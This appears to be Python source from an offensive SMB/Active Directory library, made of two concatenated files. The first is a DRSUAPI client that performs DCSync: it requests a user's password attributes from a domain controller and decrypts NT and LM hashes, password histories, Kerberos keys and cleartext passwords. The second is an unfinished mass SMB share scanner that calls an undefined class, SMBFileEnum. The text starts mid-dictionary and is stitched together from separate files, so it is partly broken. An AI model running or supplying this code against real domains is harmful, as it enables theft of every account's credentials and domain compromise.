			'userPrincipalName': 0x90290,
			'sAMAccountName': 0x900DD,
			'unicodePwd': 0x9005A,
			'dBCSPwd': 0x90037,
			'ntPwdHistory': 0x9005E,
			'lmPwdHistory': 0x900A0,
			'supplementalCredentials': 0x9007D,
			'objectSid': 0x90092,
			'userAccountControl':0x90008,
		}
		
		self.KERBEROS_TYPE = {
			1:'dec-cbc-crc',
			3:'des-cbc-md5',
			17:'aes128-cts-hmac-sha1-96',
			18:'aes256-cts-hmac-sha1-96',
			0xffffff74:'rc4_hmac',
		}
		
	async def __aenter__(self):
		return self
	
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True,None
	
	@staticmethod
	async def from_rpcconnection(connection:DCERPC5Connection, domain = None, auth_level = None, open:bool = True, perform_dummy:bool = False):
		try:
			service = DRSUAPIRPC(domainname=domain)
			service.dce = connection
			
			service.dce.set_auth_level(auth_level)
			if auth_level is None:
				service.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) #must be this value!
			
			_, err = await service.dce.connect()
			if err is not None:
				raise err
			
			_, err = await service.dce.bind(DRSUAPIRPC().service_uuid)
			if err is not None:
				raise err
			
			if open is True:
				_, err = await service.open()
				if err is not None:
					raise err

				
			return service, None
		except Exception as e:
			return False, e
	
	@staticmethod
	async def from_smbconnection(connection:SMBConnection, domain = None, auth_level = None, open:bool = True, perform_dummy:bool = False):
		"""
		Creates the connection to the service using an established SMBConnection.
		This connection will use the given SMBConnection as transport layer.
		"""
		epm = None
		try:
			if domain is None:
				domain = connection.target.domain
			if auth_level is None:
				#for SMB connection no extra auth needed
				auth_level = RPC_C_AUTHN_LEVEL_PKT_PRIVACY
			
			epm = EPM.from_smbconnection(connection)
			_, err = await epm.connect()
			if err is not None:
				raise err

			constring, err = await epm.map(DRSUAPIRPC().service_uuid)
			if err is not None:
				raise err
			
			target = DCERPCTarget.from_connection_string(constring, smb_connection = connection)
			dcerpc_auth = DCERPCAuth.from_smb_gssapi(connection.gssapi)
			rpc_connection = DCERPC5Connection(dcerpc_auth, target)
			
			service, err = await DRSUAPIRPC.from_rpcconnection(rpc_connection, domain=domain, auth_level=auth_level, open=open, perform_dummy = perform_dummy)	
			if err is not None:
				raise err

			return service, None
		except Exception as e:
			return None, e
		finally:
			if epm is not None:
				await epm.disconnect()
		
	async def open(self):
		try:			
			request = drsuapi.DRSBind()
			request['puuidClientDsa'] = drsuapi.NTDSAPI_CLIENT_GUID
			drs = drsuapi.DRS_EXTENSIONS_INT()
			drs['cb'] = len(drs) #- 4
			drs['dwFlags'] = drsuapi.DRS_EXT_GETCHGREQ_V6 | drsuapi.DRS_EXT_GETCHGREPLY_V6 | drsuapi.DRS_EXT_GETCHGREQ_V8 | \
							drsuapi.DRS_EXT_STRONG_ENCRYPTION
			drs['SiteObjGuid'] = drsuapi.NULLGUID
			drs['Pid'] = 0
			drs['dwReplEpoch'] = 0
			drs['dwFlagsExt'] = 0
			drs['ConfigObjGUID'] = drsuapi.NULLGUID
			# I'm uber potential (c) Ben
			drs['dwExtCaps'] = 0xffffffff
			request['pextClient']['cb'] = len(drs)
			request['pextClient']['rgb'] = list(drs.getData())
			resp, err = await self.dce.request(request)
			if err is not None:
				raise err

			# Let's dig into the answer to check the dwReplEpoch. This field should match the one we send as part of
			# DRSBind's DRS_EXTENSIONS_INT(). If not, it will fail later when trying to sync data.
			drsExtensionsInt = drsuapi.DRS_EXTENSIONS_INT()

			# If dwExtCaps is not included in the answer, let's just add it so we can unpack DRS_EXTENSIONS_INT right.
			ppextServer = b''.join(resp['ppextServer']['rgb']) + b'\x00' * (
			len(drsuapi.DRS_EXTENSIONS_INT()) - resp['ppextServer']['cb'])
			drsExtensionsInt.fromString(ppextServer)

			if drsExtensionsInt['dwReplEpoch'] != 0:
				# Different epoch, we have to call DRSBind again
				if logger.level == logging.DEBUG:
					logger.debug("DC's dwReplEpoch != 0, setting it to %d and calling DRSBind again" % drsExtensionsInt[
						'dwReplEpoch'])
				drs['dwReplEpoch'] = drsExtensionsInt['dwReplEpoch']
				request['pextClient']['cb'] = len(drs)
				request['pextClient']['rgb'] = list(drs.getData())
				resp, err = await self.dce.request(request)
				if err is not None:
					raise err

			self.handle = resp['phDrs']

			# Now let's get the NtdsDsaObjectGuid UUID to use when querying NCChanges
			resp, err = await drsuapi.hDRSDomainControllerInfo(self.dce, self.handle, self.domainname, 2)
			if err is not None:
				raise err
			if logger.level == logging.DEBUG:
				logger.debug('DRSDomainControllerInfo() answer %s' % resp.dump())

			if resp['pmsgOut']['V2']['cItems'] > 0:
				self.__NtdsDsaObjectGuid = resp['pmsgOut']['V2']['rItems'][0]['NtdsDsaObjectGuid']
			else:
				logger.debug("Couldn't get DC info for domain %s" % self.domainname)
				raise Exception('Fatal, aborting!')

			return True,None
		except Exception as e:
			return None, e
	
	async def get_user_secrets(self, username):
		try:
			ra = {
				'userPrincipalName': '1.2.840.113556.1.4.656',
				'sAMAccountName': '1.2.840.113556.1.4.221',
				'unicodePwd': '1.2.840.113556.1.4.90',
				'dBCSPwd': '1.2.840.113556.1.4.55',
				'ntPwdHistory': '1.2.840.113556.1.4.94',
				'lmPwdHistory': '1.2.840.113556.1.4.160',
				'supplementalCredentials': '1.2.840.113556.1.4.125',
				'objectSid': '1.2.840.113556.1.4.146',
				'pwdLastSet': '1.2.840.113556.1.4.96',
				'userAccountControl':'1.2.840.113556.1.4.8'
			}
			formatOffered = drsuapi.DS_NT4_ACCOUNT_NAME_SANS_DOMAIN
			crackedName, err = await self.DRSCrackNames(
					formatOffered,
					drsuapi.DS_NAME_FORMAT.DS_UNIQUE_ID_NAME,
					name=username
				)
			if err is not None:
				raise err
			
			###### TODO: CHECKS HERE
			
			#guid = GUID.from_string(crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['pName'][:-1][1:-1])
			guid = crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['pName'][:-1][1:-1]
			if len(guid) == 0:
				raise Exception('User "%s" cannot be found in the domain!' % username)

			userRecord, err = await self.DRSGetNCChanges(guid, ra)
			if err is not None:
				return None, err
			
			replyVersion = 'V%d' % userRecord['pdwOutVersion']
			if userRecord['pmsgOut'][replyVersion]['cNumObjects'] == 0:
				raise Exception('DRSGetNCChanges didn\'t return any object!')
			
			#print(userRecord.dump())
			#print(userRecord['pmsgOut'][replyVersion]['PrefixTableSrc']['pPrefixEntry'])
			
			record = userRecord
			prefixTable = userRecord['pmsgOut'][replyVersion]['PrefixTableSrc']['pPrefixEntry']
			##### decryption!
			logger.debug('Decrypting hash for user: %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
			
			us = SMBUserSecrets()
			user_properties = None

			rid = int.from_bytes(record['pmsgOut'][replyVersion]['pObjects']['Entinf']['pName']['Sid'][-4:], 'little', signed = False)
			
			for attr in record['pmsgOut'][replyVersion]['pObjects']['Entinf']['AttrBlock']['pAttr']:
			
				try:
					attId = drsuapi.OidFromAttid(prefixTable, attr['attrTyp'])
					LOOKUP_TABLE = self.ATTRTYP_TO_ATTID
				except Exception as e:
					logger.debug('Failed to execute OidFromAttid with error %s, fallbacking to fixed table' % e)
					logger.debug('Exception', exc_info=True)
					# Fallbacking to fixed table and hope for the best
					attId = attr['attrTyp']
					LOOKUP_TABLE = self.NAME_TO_ATTRTYP
					
				if attId == LOOKUP_TABLE['dBCSPwd']:
					if attr['AttrVal']['valCount'] > 0:
						encrypteddBCSPwd = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])
						encryptedLMHash = drsuapi.DecryptAttributeValue(self.dce.get_session_key(), encrypteddBCSPwd)
						us.lm_hash = drsuapi.removeDESLayer(encryptedLMHash, rid)
					else:
						us.lm_hash = bytes.fromhex('aad3b435b51404eeaad3b435b51404ee')
						
				elif attId == LOOKUP_TABLE['unicodePwd']:
					if attr['AttrVal']['valCount'] > 0:
						encryptedUnicodePwd = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])
						encryptedNTHash = drsuapi.DecryptAttributeValue(self.dce.get_session_key(), encryptedUnicodePwd)
						us.nt_hash = drsuapi.removeDESLayer(encryptedNTHash, rid)
					else:
						us.nt_hash = bytes.fromhex('31d6cfe0d16ae931b73c59d7e0c089c0')
						
				elif attId == LOOKUP_TABLE['userPrincipalName']:
					if attr['AttrVal']['valCount'] > 0:
						try:
							us.domain = b''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le').split('@')[-1]
						except:
							us.domain = None
					else:
						us.domain = None
							
				elif attId == LOOKUP_TABLE['sAMAccountName']:
					if attr['AttrVal']['valCount'] > 0:
						try:
							us.username = b''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le')
						except Exception as e:
							logger.error('Cannot get sAMAccountName for %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
							us.username = 'unknown'
					else:
						logger.error('Cannot get sAMAccountName for %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
						us.username = 'unknown'
							
				elif attId == LOOKUP_TABLE['objectSid']:
					if attr['AttrVal']['valCount'] > 0:
						us.object_sid = SID.from_bytes(b''.join(attr['AttrVal']['pAVal'][0]['pVal']))
					else:
						logger.error('Cannot get objectSid for %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
						us.object_sid = rid
				elif attId == LOOKUP_TABLE['pwdLastSet']:
					if attr['AttrVal']['valCount'] > 0:
						try:
							
							us.pwd_last_set = FILETIME.from_bytes(b''.join(attr['AttrVal']['pAVal'][0]['pVal'])).datetime.isoformat()
						except Exception as e:
							
							logger.error('Cannot get pwdLastSet for %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
							us.pwd_last_set = None
							
				elif attId == LOOKUP_TABLE['userAccountControl']:
					if attr['AttrVal']['valCount'] > 0:
						us.user_account_status = int.from_bytes(b''.join(attr['AttrVal']['pAVal'][0]['pVal']), 'little', signed = False)
					else:
						us.user_account_status = None
						
				if attId == LOOKUP_TABLE['lmPwdHistory']:
					if attr['AttrVal']['valCount'] > 0:
						encryptedLMHistory = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])
						tmpLMHistory = drsuapi.DecryptAttributeValue(self.dce.get_session_key(), encryptedLMHistory)
						for i in range(0, len(tmpLMHistory) // 16):
							LMHashHistory = drsuapi.removeDESLayer(tmpLMHistory[i * 16:(i + 1) * 16], rid)
							us.lm_history.append(LMHashHistory)
					else:
						logger.debug('No lmPwdHistory for user %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
				elif attId == LOOKUP_TABLE['ntPwdHistory']:
					if attr['AttrVal']['valCount'] > 0:
						encryptedNTHistory = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])
						tmpNTHistory = drsuapi.DecryptAttributeValue(self.dce.get_session_key(), encryptedNTHistory)
						for i in range(0, len(tmpNTHistory) // 16):
							NTHashHistory = drsuapi.removeDESLayer(tmpNTHistory[i * 16:(i + 1) * 16], rid)
							us.nt_history.append(NTHashHistory)
					else:
						logger.debug('No ntPwdHistory for user %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
						
				elif attId == LOOKUP_TABLE['supplementalCredentials']:
					if attr['AttrVal']['valCount'] > 0:
						blob = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])
						supplementalCredentials = drsuapi.DecryptAttributeValue(self.dce.get_session_key(), blob)
						if len(supplementalCredentials) < 24:
							supplementalCredentials = None
							
						else:
							try:
								user_properties = samr.USER_PROPERTIES(supplementalCredentials)
							except Exception as e:
								# On some old w2k3 there might be user properties that don't
								# match [MS-SAMR] structure, discarding them
								pass
				
			
			if user_properties is not None:
				propertiesData = user_properties['UserProperties']
				for propertyCount in range(user_properties['PropertyCount']):
					userProperty = samr.USER_PROPERTY(propertiesData)
					propertiesData = propertiesData[len(userProperty):]
					# For now, we will only process Newer Kerberos Keys and CLEARTEXT
					if userProperty['PropertyName'].decode('utf-16le') == 'Primary:Kerberos-Newer-Keys':
						propertyValueBuffer = bytes.fromhex(userProperty['PropertyValue'].decode())
						kerbStoredCredentialNew = samr.KERB_STORED_CREDENTIAL_NEW(propertyValueBuffer)
						data = kerbStoredCredentialNew['Buffer']
						for credential in range(kerbStoredCredentialNew['CredentialCount']):
							keyDataNew = samr.KERB_KEY_DATA_NEW(data)
							data = data[len(keyDataNew):]
							keyValue = propertyValueBuffer[keyDataNew['KeyOffset']:][:keyDataNew['KeyLength']]

							if  keyDataNew['KeyType'] in self.KERBEROS_TYPE:
								answer =  (self.KERBEROS_TYPE[keyDataNew['KeyType']],keyValue)
							else:
								answer =  (hex(keyDataNew['KeyType']),keyValue)
							# We're just storing the keys, not printing them, to make the output more readable
							# This is kind of ugly... but it's what I came up with tonight to get an ordered
							# set :P. Better ideas welcomed ;)
							us.kerberos_keys.append(answer)
					elif userProperty['PropertyName'].decode('utf-16le') == 'Primary:CLEARTEXT':
						# [MS-SAMR] 3.1.1.8.11.5 Primary:CLEARTEXT Property
						# This credential type is the cleartext password. The value format is the UTF-16 encoded cleartext password.
						# SkelSec: well, almost. actually the property is the hex-encoded bytes of an UTF-16LE encoded plaintext string
						encoded_pw = bytes.fromhex(userProperty['PropertyValue'].decode('ascii'))
						try:
							answer = encoded_pw.decode('utf-16le')
						except UnicodeDecodeError:
							# This could be because we're decoding a machine password. Printing it hex
							answer = encoded_pw.decode('utf-8')

						us.cleartext_pwds.append(answer)
				
		
			return us, None
		
		except Exception as e:
			return None, e
			
	async def DRSCrackNames(self, formatOffered=drsuapi.DS_NAME_FORMAT.DS_DISPLAY_NAME, formatDesired=drsuapi.DS_NAME_FORMAT.DS_FQDN_1779_NAME, name=''):
		try:
			logger.debug('Calling DRSCrackNames for %s' % name)
			resp, err = await drsuapi.hDRSCrackNames(self.dce, self.handle, 0, formatOffered, formatDesired, (name,))
			return resp, None
		except Exception as e:
			return None, e
	
	async def DRSGetNCChanges(self, guid, req_attributes = {}):
		try:
			logger.debug('Calling DRSGetNCChanges for %s ' % guid)
			request = drsuapi.DRSGetNCChanges()
			request['hDrs'] = self.handle
			request['dwInVersion'] = 8

			request['pmsgIn']['tag'] = 8
			request['pmsgIn']['V8']['uuidDsaObjDest'] = self.__NtdsDsaObjectGuid
			request['pmsgIn']['V8']['uuidInvocIdSrc'] = self.__NtdsDsaObjectGuid

			dsName = drsuapi.DSNAME()
			dsName['SidLen'] = 0
			dsName['Guid'] = string_to_bin(guid)#guid.to_bytes()
			dsName['Sid'] = ''
			dsName['NameLen'] = 0
			dsName['StringName'] = ('\x00')

			dsName['structLen'] = len(dsName.getData())

			request['pmsgIn']['V8']['pNC'] = dsName

			request['pmsgIn']['V8']['usnvecFrom']['usnHighObjUpdate'] = 0
			request['pmsgIn']['V8']['usnvecFrom']['usnHighPropUpdate'] = 0

			request['pmsgIn']['V8']['pUpToDateVecDest'] = NULL

			request['pmsgIn']['V8']['ulFlags'] =  drsuapi.DRS_INIT_SYNC | drsuapi.DRS_WRIT_REP
			request['pmsgIn']['V8']['cMaxObjects'] = 1
			request['pmsgIn']['V8']['cMaxBytes'] = 0
			request['pmsgIn']['V8']['ulExtendedOp'] = drsuapi.EXOP_REPL_OBJ
			if self.__ppartialAttrSet is None:
				self.__prefixTable = []
				self.__ppartialAttrSet = drsuapi.PARTIAL_ATTR_VECTOR_V1_EXT()
				self.__ppartialAttrSet['dwVersion'] = 1
				self.__ppartialAttrSet['cAttrs'] = len(req_attributes)
				for attId in list(req_attributes.values()):
					self.__ppartialAttrSet['rgPartialAttr'].append(drsuapi.MakeAttid(self.__prefixTable , attId))
			request['pmsgIn']['V8']['pPartialAttrSet'] = self.__ppartialAttrSet
			request['pmsgIn']['V8']['PrefixTableDest']['PrefixCount'] = len(self.__prefixTable)
			request['pmsgIn']['V8']['PrefixTableDest']['pPrefixEntry'] = self.__prefixTable
			request['pmsgIn']['V8']['pPartialAttrSetEx1'] = NULL

			data, err = await self.dce.request(request)
			return data, err
		except Exception as e:
			return None, e


	async def DRSGetNT4ChangeLog(self):
		try:
			logger.debug('Calling DRSGetNT4ChangeLog')
			resp, err = await drsuapi.hDRSGetNT4ChangeLog(self.dce, self.handle)
			if err is not None:
				raise err
			return resp, None
		except Exception as e:
			return None, e

	async def close(self):
		try:
			if self.handle:
				try:
					await drsuapi.hDRSUnbind(self.dce, self.handle)
				except:
					pass
			if self.dce:
				try:
					await self.dce.disconnect()
				except:
					pass
			
			return True,None
		except Exception as e:
			return None, e



#TODO: not implemented fully....
import asyncio

from aiosmb.commons.scanner.common.comms import EnumResult, EnumResultStatus
from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.commons.interfaces.machine import SMBMachine


class SMBScanner:
	def __init__(self, smb_url, worker_count = 100, depth = 3, enum_url = True):
		self.target_gens = []
		self.smb_mgr = SMBConnectionFactory.from_url(smb_url)
		self.worker_count = worker_count
		self.task_q = None
		self.res_q = None
		self.depth = depth
		self.workers = []
		self.result_processing_task = None
		self.enum_url = enum_url
		self.__gens_finished = False
		self.__total_targets = 0
		self.__total_finished = 0

	async def __executor(self, tid, target):
		try:
			
			connection = self.smb_mgr.create_connection_newtarget(target)
			async with connection:
				_, err = await connection.login()
				if err is not None:
					raise err

				machine = SMBMachine(connection)

				async for path, otype, err in machine.enum_all_recursively(depth = self.depth):
					er = EnumResult(tid, target, (path, otype, err))
					await self.res_q.put(er)
		except asyncio.CancelledError:
			return
		except Exception as e:
			await self.res_q.put(EnumResult(tid, target, None, error = e, status = EnumResultStatus.ERROR))
		finally:
			await self.res_q.put(EnumResult(tid, target, None, status = EnumResultStatus.FINISHED))

	async def worker(self):
		try:
			while True:
				indata = await self.task_q.get()
				if indata is None:
					return
				
				tid, target = indata
				try:
					await asyncio.wait_for(self.__executor(tid, target), timeout=10)
				except:
					pass
		except asyncio.CancelledError:
			return
				
		except Exception as e:
			return e

	async def result_processing(self):
		try:
			while True:
				er = await self.res_q.get()
				if er.status == EnumResultStatus.FINISHED:
					self.__total_finished += 1
					if self.__total_finished == self.__total_targets and self.__gens_finished is True:
						await self.terminate()
						return
				
				if er.result is not None:
					path, otype, err = er.result
					if otype is not None:
						print('[%s] %s' % (otype[0].upper(), path))
					if err is not None:
						print('[E] %s %s' % (err, path))

		except asyncio.CancelledError:
			return
		except Exception as e:
			print(e)

	async def terminate(self):
		for worker in self.workers:
			worker.cancel()
		if self.result_processing_task is not None:
			self.result_processing_task.cancel()

	async def setup(self):
		try:
			if self.res_q is None:
				self.res_q = asyncio.Queue(self.worker_count)
				self.result_processing_task = asyncio.create_task(self.result_processing())
			if self.task_q is None:
				self.task_q = asyncio.Queue()

			for _ in range(self.worker_count):
				self.workers.append(asyncio.create_task(self.worker()))

			return True, None
		except Exception as e:
			return None, e
	
	async def run(self):
		try:
			_, err = await self.setup()
			if err is not None:
				raise err
			
			if self.enum_url is True:
				self.__total_targets += 1
				await self.task_q.put((str(uuid.uuid4()), self.smb_mgr.get_target().get_hostname_or_ip()))
			
			for target_gen in self.target_gens:
				total, err = await target_gen.run(self.task_q)
				self.__total_targets += total
				if err is not None:
					print('Target gen error! %s' % err)

			self.__gens_finished = True
			
			await asyncio.gather(*self.workers)
			print(1)
			return True, None
		except Exception as e:
			print(e)
			return None, e

async def amain():
	import argparse

	parser = argparse.ArgumentParser(description='SMB Share enumerator')
	parser.add_argument('-d', '--depth', type=int, default=3, help='Recursion depth, -1 means infinite')
	parser.add_argument('-w', '--smb-worker-count', type=int, default=100, help='Parallell count')
	parser.add_argument('-t', '--targets-file', help='Targets file, one ip or hostname per line')
	parser.add_argument('-m', '--machine', help='Targetmachoine ip or hostname, can be stacked')
	parser.add_argument('smb_url', help = 'Connection string that describes the authentication and target. Example: smb+ntlm-password://TEST\\Administrator:password@10.10.10.2')
	args = parser.parse_args()


	enumerator = SMBFileEnum(args.smb_url, worker_count = args.smb_worker_count, depth = args.depth)
	
	if args.targets_file is not None:
		enumerator.target_gens.append(FileTargetGen(args.targets_file))
	if args.machine is not None:
		enumerator.target_gens.append(ListTargetGen(args.machine))

	await enumerator.run()
	print('Done!')

def main():
	asyncio.run(amain())

if __name__ == '__main__':
	main()